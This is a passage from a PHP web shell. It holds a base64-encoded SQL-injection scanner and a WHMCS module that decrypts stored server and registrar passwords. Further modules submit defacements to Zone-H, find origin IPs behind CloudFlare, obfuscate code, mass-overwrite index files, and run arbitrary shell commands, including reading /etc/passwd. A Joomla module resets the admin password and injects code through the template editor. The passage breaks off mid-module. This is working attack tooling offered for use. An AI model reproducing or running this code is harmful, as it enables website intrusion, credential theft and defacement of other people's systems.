BocD9sPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cmV2aWV3LnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOmluaXppYXRpdmEucGhwP2luPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6Y3VycmljdWx1bS5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpsYWJlbHMucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6c3RvcnkucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6bG9vay5waHA/SUQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpuZXdzb25lLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOmFib3V0Ym9vay5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDptYXRlcmlhbC5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpvcGluaW9ucy5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDphbm5vdW5jZS5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpydWIucGhwP2lkcj08L29wdGlvbj48b3B0aW9uPmludXJsOmdhbGVyaV9pbmZvLnBocD9sPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6dGVrc3QucGhwP2lkdD08L29wdGlvbj48b3B0aW9uPmludXJsOm5ld3NjYXQucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6bmV3c3RpY2tlcl9pbmZvLnBocD9pZG49PC9vcHRpb24+PG9wdGlvbj5pbnVybDpydWJyaWthLnBocD9pZHI9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpydWJwLnBocD9pZHI9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpvZmZlci5waHA/aWRmPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6YXJ0LnBocD9pZG09PC9vcHRpb24+PG9wdGlvbj5pbnVybDp0aXRsZS5waHA/aWQ9PC9vcHRpb24+PC9zZWxlY3Q+DQoJCQk8aW5wdXQgdHlwZT0idGV4dCIgaWQ9ImRvcmsiIG5hbWU9ImRvcmsiIHZhbHVlPSI8P3BocCBlY2hvIChpc3NldCgkX1BPU1RbJ2RvcmsnXXswfSkpID8gaHRtbGVudGl0aWVzKCRfUE9TVFsnZG9yayddKSA6ICdpbnVybDpwaHA/aWQ9JzsgPz4iIC8+DQoJCQk8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iU3RhcnQiIGlkPSJidXR0b24iLz4NCgkJPC9mb3JtPg0KCQk8P3BocA0KCQkJaWYoaXNzZXQoJF9QT1NUWydkb3JrJ117MH0pKXsNCgkJCQkNCgkJCQllY2hvICc8ZGl2IGlkPSJyZXN1bHQiPlN0YXJ0Li48YnI+JzsJCQkNCgkJCQlsZXRJdEJ5KCk7CQkJDQoJCQkJZm9yKCRnb29nbGVQYWdlID0gMTsgJGdvb2dsZVBhZ2UgPD0gMTA7ICRnb29nbGVQYWdlKyspew0KCQkJCQ0KCQkJCQkkZ29vZ2xlUmVzdWx0ID0gZ29vZ2xlX3RoYXQoJF9QT1NUWydkb3JrJ10sICRnb29nbGVQYWdlKTsNCgkJCQkJaWYoISRnb29nbGVSZXN1bHQpew0KCQkJCQkJZWNobyAnZ29vZ2xlIGRvbnQgaGV2ZSBtb3JlIHJlc3VsdCwgc28gSSBkb25lLi4oPyknOw0KCQkJCQkJYnJlYWs7DQoJCQkJCX0NCgkJCQkJDQoJCQkJCWZvcigkdmljdGltID0gMDsgJHZpY3RpbSA8IHNpemVvZigkZ29vZ2xlUmVzdWx0KTsgJHZpY3RpbSsrKXsNCgkJCQkJDQoJCQkJCQlpZihjaGVja19pbmplY3Rpb24oJGdvb2dsZVJlc3VsdFskdmljdGltXVsndW5lc2NhcGVkVXJsJ10pKXsNCgkJCQkJCQllY2hvICc8c3BhbiBjbGFzcz0iWSI+JzsNCgkJCQkJCS8vCWZpbGVfcHV0X2NvbnRlbnRzKCJsb2cudHh0IiwgInskZ29vZ2xlUmVzdWx0WyR2aWN0aW1dWyd1bmVzY2FwZWRVcmwnXX1cbiIpOw0KCQkJCQkJfQ0KCQkJCQkJZWxzZSBlY2hvICc8c3BhbiBjbGFzcz0iWCI+JzsNCgkJCQkJCQ0KCQkJCQkJZWNobyAiPGEgaHJlZj1cInskZ29vZ2xlUmVzdWx0WyR2aWN0aW1dWyd1bmVzY2FwZWRVcmwnXX1cIiB0YXJnZXQ9J19ibGFuayc+eyRnb29nbGVSZXN1bHRbJHZpY3RpbV1bJ3RpdGxlTm9Gb3JtYXR0aW5nJ119PC9hPjwvc3Bhbj5cbiI7DQoJCQkJCQlsZXRJdEJ5KCk7DQoJCQkJCX0NCgkJCQl9DQoJCQkJZWNobyAnPC9kaXY+JzsNCgkJCX0NCgkJPz4NCgkJUG93ZXJkIEJ5IGdvb2dsZS4NCgk8L2JvZHk+DQo8L2h0bWw+DQo=';
$file = fopen("scansqli.php" ,"w+");
$write = fwrite ($file ,base64_decode($scansqli));
fclose($file);
chmod("scansqli.php",0755);
echo " <iframe src=scansqli/scansqli.php width=96% height=76% frameborder=0></iframe>
</div>"; }
/////////////////////////////////////////////////////////////////
elseif(isset($_GET['x']) && ($_GET['x'] == 'whmcs'))
{
?>
<form action="?y=<?php echo $pwd; ?>&amp;x=whmcs" method="post">
<?php
function decrypt ($string,$cc_encryption_hash)
{
$key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
$hash_key = _hash ($key);
$hash_length = strlen ($hash_key);
$string = base64_decode ($string);
$tmp_iv = substr ($string, 0, $hash_length);
$string = substr ($string, $hash_length, strlen ($string) - $hash_length);
$iv = $out = '';
$c = 0;
while ($c < $hash_length)
{
$iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
++$c;
}
$key = $iv;
$c = 0;
while ($c < strlen ($string))
{
if (($c != 0 AND $c % $hash_length == 0))
{
$key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
}
$out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
++$c;
}
return $out;
}
function _hash ($string)
{
if (function_exists ('sha1'))
{
$hash = sha1 ($string);
}
else
{
$hash = md5 ($string);
}
$out = '';
$c = 0;
while ($c < strlen ($hash))
{
$out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
$c += 2;
}
return $out;
}
echo "
<br><center><font size='5' color='#00ff00'><b>-=[ WHMCS Decoder ]=-</b></font></center>
<center>
<br>
<FORM action='' method='post'>
<input type='hidden' name='form_action' value='2'>
<br>
<table class=tabnet style=width:320px;padding:0 1px;>
<tr><th colspan=2>WHMCS Decoder</th></tr>
<tr><td>db_host </td><td><input type='text' style='color:#00ff00;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
<tr><td>db_username </td><td><input type='text' style='color:#00ff00;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
<tr><td>db_password</td><td><input type='text' style='color:#00ff00;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
<tr><td>db_name</td><td><input type='text' style='color:#00ff00;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
<tr><td>cc_encryption_hash</td><td><input style='color:#00ff00;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
<td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#00ff00;background-color:' value='Submit' name='Submit'></td>
</table>
</FORM>
</center>
";
if($_POST['form_action'] == 2 )
{
//include($file);
$db_host=($_POST['db_host']);
$db_username=($_POST['db_username']);
$db_password=($_POST['db_password']);
$db_name=($_POST['db_name']);
$cc_encryption_hash=($_POST['cc_encryption_hash']);
$link=mysql_connect($db_host,$db_username,$db_password) ;
mysql_select_db($db_name,$link) ;
$query = mysql_query("SELECT * FROM tblservers");
while($v = mysql_fetch_array($query)) {
$ipaddress = $v['ipaddress'];
$username = $v['username'];
$type = $v['type'];
$active = $v['active'];
$hostname = $v['hostname'];
echo("<center><table border='1'>");
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>Type</td><td>$type</td></tr>");
echo("<tr><td>Active</td><td>$active</td></tr>");
echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
echo("<tr><td>Username</td><td>$username</td></tr>");
echo("<tr><td>Password</td><td>$password</td></tr>");
echo "</table><br><br></center>";
}
$link=mysql_connect($db_host,$db_username,$db_password) ;
mysql_select_db($db_name,$link) ;
$query = mysql_query("SELECT * FROM tblregistrars");
echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
while($v = mysql_fetch_array($query)) {
$registrar = $v['registrar'];
$setting = $v['setting'];
$value = decrypt ($v['value'], $cc_encryption_hash);
if ($value=="") {
$value=0;
}
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
}
}
}
elseif(isset($_GET['x']) && ($_GET['x'] == 'zone'))
{
?>
<form action="?y=<?php echo $pwd; ?>&amp;x=zone" method="post">
<br><br><center>
<!-- Zone-H -->
<form action="" method='POST'><table><table class='tabnet'><tr>
<td style='background-color:#0000;padding-left:10px;'><tr><tr><th colspan="2"><h2>Zone-H Defacer</h2></th></tr></td></tr><tr><td height='45' colspan='2'><form method="post">
<input type="text" class="inputz" name="defacer" value="Nama Defacer" />
<select name="hackmode" class="inputz" >
<option >------------------------Pilih Salah Satu------------------------</option>
<option value="1">known vulnerability (i.e. unpatched system)</option>
<option value="2" >undisclosed (new) vulnerability</option>
<option value="3" >configuration / admin. mistake</option>
<option value="4" >brute force attack</option>
<option value="5" >social engineering</option>
<option value="6" >Web Server intrusion</option>
<option value="7" >Web Server external module intrusion</option>
<option value="8" >Mail Server intrusion</option>
<option value="9" >FTP Server intrusion</option>
<option value="10" >SSH Server intrusion</option>
<option value="11" >Telnet Server intrusion</option>
<option value="12" >RPC Server intrusion</option>
<option value="13" >Shares misconfiguration</option>
<option value="14" >Other Server intrusion</option>
<option value="15" >SQL Injection</option>
<option value="16" >URL Poisoning</option>
<option value="17" >File Inclusion</option>
<option value="18" >Other Web Application bug</option>
<option value="19" >Remote administrative panel access bruteforcing</option>
<option value="20" >Remote administrative panel access password guessing</option>
<option value="21" >Remote administrative panel access social engineering</option>
<option value="22" >Attack against administrator(password stealing/sniffing)</option>
<option value="23" >Access credentials through Man In the Middle attack</option>
<option value="24" >Remote service password guessing</option>
<option value="25" >Remote service password bruteforce</option>
<option value="26" >Rerouting after attacking the Firewall</option>
<option value="27" >Rerouting after attacking the Router</option>
<option value="28" >DNS attack through social engineering</option>
<option value="29" >DNS attack through cache poisoning</option>
<option value="30" >Not available</option>
</select>
<select name="reason" class="inputz" >
<option >-------------Pilih Salah Satu---------------</option>
<option value="1" >Heh...just for fun!</option>
<option value="2" >Revenge against that website</option>
<option value="3" >Political reasons</option>
<option value="4" >As a challenge</option>
<option value="5" >I just want to be the best defacer</option>
<option value="6" >Patriotism</option>
<option value="7" >Not available</option>
</select>
<input type="hidden" name="action" value="zone">
<center><textarea style="background:black;outline:none;" name="domain" cols="116" rows="9" id="domains">List Of Domains</textarea>
<br /><input class='inputzbut' type="submit" value="Send Now !" name="SendNowToZoneH" /><br></center></table>
</form></td></tr></table></form>
<!-- End Of Zone-H -->
</td></center><br><br>
<?php
echo '<center>';
ob_start();
$sub = get_loaded_extensions();
if(!in_array("curl", $sub)){die('[-] Curl Is Not Supported !! ');}
$hacker = $_POST['defacer'];
$method = $_POST['hackmode'];
$neden = $_POST['reason'];
$site = $_POST['domain'];
if (empty($hacker)){die ("[-] You Must Fill the Attacker name !");}
elseif($method == "--------SELECT--------") {die("[-] You Must Select The Method !");}
elseif($neden == "--------SELECT--------") {die("[-] You Must Select The Reason");}
elseif(empty($site)) {die("[-] You Must Inter the Sites List ! ");}
$i = 0;
$sites = explode("\n", $site);
while($i < count($sites))
{
if(substr($sites[$i], 0, 4) != "http") {$sites[$i] = "http://".$sites[$i];}
ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
echo "Site : ".$sites[$i]." Defaced !\n";
++$i;
}
echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";
echo '</center>';
}
/////////////////////////////////////////////////////////////////////////////////////////////
elseif(isset($_GET['x']) && ($_GET['x'] == 'bypass-cf'))
{
echo '
<form method="POST"><br><br>
<center><p align="center" dir="ltr"><b><font size="5" face="Tahoma">+--=[ Bypass
<font color="#CC0000">CloudFlare</font> ]=--+</font></b></p>
<select class="inputz" name="krz">
<option>ftp</option>
<option>direct-conntect</option>
<option>webmail</option>
<option>cpanel</option>
</select>
<input class="inputz" type="text" name="target" value="url">
<input class="inputzbut" type="submit" value="Bypass"></center>
';
$target = $_POST['target'];
# Bypass From FTP
if($_POST['krz'] == "ftp") {
$ftp = gethostbyname("ftp."."$target");
echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$ftp</font></p>";
}
# Bypass From Direct-Connect
if($_POST['krz'] == "direct-conntect") {
$direct = gethostbyname("direct-connect."."$target");
echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$direct</font></p>";
}
# Bypass From Webmail
if($_POST['krz'] == "webmail") {
$web = gethostbyname("webmail."."$target");
echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$web</font></p>";
}
# Bypass From Cpanel
if($_POST['krz'] == "cpanel") {
$cpanel = gethostbyname("cpanel."."$target");
echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$cpanel</font></p>";
}
}
//////////////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////////////
elseif(isset($_GET['x']) && ($_GET['x'] == 'hashid')) {
if(isset($_POST['gethash'])){
$hash = $_POST['hash'];
if(strlen($hash)==32){
$hashresult = "MD5 Hash";
}elseif(strlen($hash)==40){
$hashresult = "SHA-1 Hash/ /MySQL5 Hash";
}elseif(strlen($hash)==13){
$hashresult = "DES(Unix) Hash";
}elseif(strlen($hash)==16){
$hashresult = "MySQL Hash / /DES(Oracle Hash)";
}elseif(strlen($hash)==41){
$GetHashChar = substr($hash, 40);
if($GetHashChar == "*"){
$hashresult = "MySQL5 Hash";
}
}elseif(strlen($hash)==64){
$hashresult = "SHA-256 Hash";
}elseif(strlen($hash)==96){
$hashresult = "SHA-384 Hash";
}elseif(strlen($hash)==128){
$hashresult = "SHA-512 Hash";
}elseif(strlen($hash)==34){
if(strstr($hash, '$1$')){
$hashresult = "MD5(Unix) Hash";
}
}elseif(strlen($hash)==37){
if(strstr($hash, '$apr1$')){
$hashresult = "MD5(APR) Hash";
}
}elseif(strlen($hash)==34){
if(strstr($hash, '$H$')){
$hashresult = "MD5(phpBB3) Hash";
}
}elseif(strlen($hash)==34){
if(strstr($hash, '$P$')){
$hashresult = "MD5(Wordpress) Hash";
}
}elseif(strlen($hash)==39){
if(strstr($hash, '$5$')){
$hashresult = "SHA-256(Unix) Hash";
}
}elseif(strlen($hash)==39){
if(strstr($hash, '$6$')){
$hashresult = "SHA-512(Unix) Hash";
}
}elseif(strlen($hash)==24){
if(strstr($hash, '==')){
$hashresult = "MD5(Base-64) Hash";
}
}else{
$hashresult = "Hash type not found";
}
}else{
$hashresult = "Not Hash Entered";
}
?>
<center><br><Br><br>
<form action="" method="POST">
<tr>
<table class="tabnet">
<th colspan="5">Hash Identification</th>
<tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td> <td><input type="text" name="hash" size='60' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
<tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
</table></tr></form>
</center>
<?php
}
//////////////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////////////
elseif(isset($_GET['x']) && ($_GET['x'] == 'stringtwo')){
$text = $_POST['code'];
?><center>
<BR>
<br><div class="jaya">Script Encode & Decode</div><br>
<br><?php
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$text = $_POST['code'];
?>
<form method="post"><br><br><br>
<textarea class='inputz' cols=80 rows=10 name="code"></textarea><br><br>
<select class='inputz' size="1" name="ope">
<option value="urlencode">url</option>
<option value="base64">Base64</option>
<option value="ur">convert_uu</option>
<option value="gzinflates">gzinflate - base64</option>
<option value="str2">str_rot13 - base64</option>
<option value="gzinflate">str_rot13 - gzinflate - base64</option>
<option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
<option value="url">base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
</select>&nbsp;<input class='inputzbut' type='submit' name='submit' value='Encode'>
<input class='inputzbut' type='submit' name='submits' value='Decode'>
</form>
<?php
$submit = $_POST['submit'];
if (isset($submit)){
$op = $_POST["ope"];
switch ($op) {case 'base64': $codi=base64_encode($text);
break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
break;case 'gzinflates' : $codi=base64_encode(gzdeflate($text));
break;case 'str2' : $codi=base64_encode(str_rot13($text));
break;case 'urlencode' : $codi=rawurlencode($text);
break;case 'ur' : $codi=convert_uuencode($text);
break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
break;default:break;}}
$submit = $_POST['submits'];
if (isset($submit)){
$op = $_POST["ope"];
switch ($op) {case 'base64': $codi=base64_decode($text);
break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
break;case 'gzinflates' : $codi=gzinflate(base64_decode($text));
break;case 'str2' : $codi=str_rot13(base64_decode($text));
break;case 'urlencode' : $codi=rawurldecode($text);
break;case 'ur' : $codi=convert_uudecode($text);
break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
break;default:break;}}
echo '<textarea cols=80 rows=10 class="inputz" readonly>'.$codi.'</textarea></center><BR><BR>';
}
/////////////////////////////////////////////////////////////////////////////////////////////
elseif(isset($_GET['x']) && ($_GET['x'] == 'mass'))
{
echo "<center/><br/><b><font color=#00ff00>-=[ Mass Deface ]=-</font></b><br>";
error_reporting(0);?>
<form ENCTYPE="multipart/form-data" action="<?php $_SERVER['PHP_SELF']?>" method='post'>
<td><table><table class="tabnet" >
<form hethot='post'>
<tr>
<tr>
<td>&nbsp;&nbsp;Folder</td><td><input class ='inputz' type='text' name='path' size='60' value="<?php echo getcwd();?>"></td>
</tr><br>
<tr>
<td>file name</td><td><input class ='inputz' type='text' name='file' size='60' value="index.php"></td>
</tr>
</tr>
<th colspan='2'><b>Index code</b></th><br></table>
<textarea style='background:black;outline:none;' name='index' rows='10' cols='67'>HACKED BY CYBERBAGHOST,PATCH YOUR SECURITY SYSTEM</textarea><br>
<center><input class='inputzbut' type='submit' value="&nbsp;&nbsp;Deface&nbsp;&nbsp;"></center></form></table><br></form>
<?php $mainpath=$_POST[path];$file=$_POST[file];$dir=opendir("$mainpath");$code=base64_encode($_POST[index]);$indx=base64_decode($code);while($row=readdir($dir)){$start=@fopen("$row/$file","w+");$finish=@fwrite($start,$indx);if ($finish){echo "$row/$file > Done<br><br>";}}}
//////////////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////////////
elseif(isset($_GET['x']) && ($_GET['x'] == 'bypass'))
{
?>
<form action="?y=<?php echo $pwd; ?>&amp;x=bypass" method="post">
<?php
echo "<center/><br/><b><font color=#00ff00>-=[ Command Bypass Exploit ]=-</font></b><br>
";
print_r('
<pre>
<form method="POST" action="">
<b><font color=#00ff00><b><font color="#00ff00">Command :=) </font></font></b><input name="baba" type="text" class="inputz" size="34"><input type="submit" class="inputzbut" value="Go">
</form>
<form method="POST" action=""><strong><b><font color="#00ff00">Menu Bypass :=) </font></strong><select name="liz0" size="1" class="inputz">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">netstat</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" class="inputzbut" value="G&ouml;">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
$liz0=shell_exec($_POST[baba]);
$liz0zim=shell_exec($_POST[liz0]);
$uid=shell_exec('id');
$server=shell_exec('uname -a');
echo "<pre><h4>";
echo $liz0;
echo $liz0zim;
echo "</h4></pre>";
"</div>"; }
///////////////////////////////////////////////////////////////////////////
elseif(isset($_GET['x']) && ($_GET['x'] == 'jodexer'))
{
?>
<form action="?y=<?php echo $pwd; ?>&amp;x=jodexer" method="post">
<?php
function randomt() {
$chars = "abcdefghijkmnopqrstuvwxyz023456789";
srand((double)microtime()*1000000);
$i = 0;
$pass = '' ;
while ($i <= 7) {
$num = rand() % 33;
$tmp = substr($chars, $num, 1);
$pass = $pass . $tmp;
$i++;
}
return $pass;
}
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)
{
$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[$i]);
$ar=trim($ar1[0]);
return $ar;
}
if ($_POST['form_action'])
{
$text=file_get_contents($_POST['file']);
$username=entre2v2($text,"public $user = '","';");
$password=entre2v2($text,"public $password = ', '","';");
$dbname=entre2v2($text,"public $db = ', '","';");
$dbprefix=entre2v2($text,"public $dbprefix = '","';");
$site_url=($_POST['site_url']);
$h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['code']))))."'))); exit; ?>";
$co=randomt();
/*
echo($username);
echo("<br>");
echo($password);
echo("<br>");
echo($dbname);
echo("<br>");
echo($dbprefix);
echo("<br>");
*/
$co=randomt();
if ($_POST['form_action'])
{
$h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['code']))))."'))); exit; ?>";
$link=mysql_connect("dzoed.druknet.bt",$username,$password) ;
mysql_select_db($dbname,$link) ;
$tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
echo("<br>[+] Changing admin password to 123456789");
$req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
if ( $req )
{
#################################################################
###################### V1.6 ######################
#################################################################
$req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
$data = mysql_fetch_array($req);
$template_name=$data["template"];
$req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
$data = mysql_fetch_array($req);
$template_id=$data["extension_id"];
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
///////////////////////////
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$pos = strpos($buffer,"com_config");
if($pos === false) {
echo("<br>[-] Login Error");
exit;
}
else {
echo("<br>[~] Login Successful");
}
///////////////////////////
$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
if($hidden2) {
echo("<br>[+] index.php file founded in Theme Editor");
}
else {
echo("<br>[-] index.php Not found in Theme Editor");
exit;
}
echo("<br>[*] Updating Index.php .....");
$url2=$site_url."/index.php?option=com_templates&layout=edit";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$pos = strpos($buffer,'<dd class="message message">');
if($pos === false) {
echo("<br>[-] Updating Index.php Error");
exit;
}
else {
echo("<br>[~] index.php successfully saved");
}
#################################################################
###################### V1.6 END ######################
#################################################################
}
else
{
#################################################################
###################### V1.5 ######################
#################################################################
$req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
$data = mysql_fetch_array($req);
$template_name=$data["template"];
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$pos = strpos($buffer,"com_config");
if($pos === false) {
echo("<br>[-] Login Error");
exit;
}
else {
echo("<br>[+] Login Successful");
}
///////////////////////////
$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
if($hidden2) {
echo("<br>[~] index.php file founded in Theme Editor");
}
else {
echo("<br>[-] index.php Not found in Theme Editor");
}
echo("<br>[*] Updating Index.php .....");
$url2=$site_url."/index.php?option=com_templates&layout=edit";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$pos = strpos($buffer,'<dd class="message message fade">');
if($pos === false) {
